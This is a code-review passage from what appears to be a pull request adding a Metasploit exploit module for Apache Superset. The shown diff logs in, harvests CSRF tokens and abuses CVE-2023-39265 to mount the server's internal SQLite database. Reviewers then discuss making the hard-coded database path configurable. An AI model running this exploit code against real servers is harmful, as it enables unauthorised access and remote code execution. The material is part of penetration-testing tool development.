modules/exploits/linux/http/apache_superset_cookie_sig_rce.rb

```diff
@@ -0,0 +1,448 @@
+
+    fail_with(Failure::NotFound, 'Unable to determine csrf token') unless res.body =~ /name="csrf_token" type="hidden" value="([\w.-]+)">/
+
+    @csrf_token = Regexp.last_match(1)
+    vprint_status("#{peer} - CSRF Token: #{@csrf_token}")
+    print_status("#{peer} - Attempting login")
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'login', '/'),
+      'keep_cookies' => true,
+      'method' => 'POST',
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        'csrf_token' => @csrf_token
+      }
+    })
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::NoAccess, "#{peer} - Failed login") if res.body.include? 'Sign In'
+  end
+
+  def set_query_latest_query_id
+    vprint_status('Setting latest query id')
+    client_id = Rex::Text.rand_text_alphanumeric(8, 12)
+    data = Rex::MIME::Message.new
+    data.add_part('"' + client_id + '"', nil, nil, 'form-data; name="latest_query_id"')
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'tabstateview', @tab_id),
+      'keep_cookies' => true,
+      'method' => 'PUT',
+      'data' => data.to_s,
+      'headers' => {
+        'Accept' => 'application/json',
+        'X-CSRFToken' => @csrf_token
+      }
+    )
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 200
+
+    client_id
+  end
+
+  def cve_2023_39265
+    # first, get our CSRF token
+    vprint_status('Grabbing CSRF token')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'superset', 'welcome/'),
+      'keep_cookies' => true
+    )
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 200
+    fail_with(Failure::NotFound, 'Unable to determine csrf token') unless res.body =~ /id="csrf_token"[\n\s+]+?value="([^"]+)"/
+
+    @csrf_token = Regexp.last_match(1)
+    vprint_good("CSRF Token: #{@csrf_token}")
+
+    # use cve-2023-39265 bypass to mount superset's internal sqlite db
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'database/'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'ctype' => 'application/json',
+      'headers' => {
+        'Accept' => 'application/json',
+        'X-CSRFToken' => @csrf_token
+      },
+      'data' => {
+        'engine' => 'sqlite',
+        'configuration_method' => 'sqlalchemy_form',
+        'catalog' => [{ 'name' => '', 'value' => '' }],
+        'sqlalchemy_uri' => 'sqlite+pysqlite:////app/superset_home/superset.db',
```

Comment:
Just to ask the obvious, can this path change? Without any context it looks like like a hard-coded docker path

Reply:
Looks like thats up to the user and configurable.  AKA I don't think (other than docker) there is a default. I'll add it as a datastore option so the user can configure.

https://github.com/apache/superset/blob/master/superset/config.py#L80-L83

Reply:
What are the chances a relative path works 😄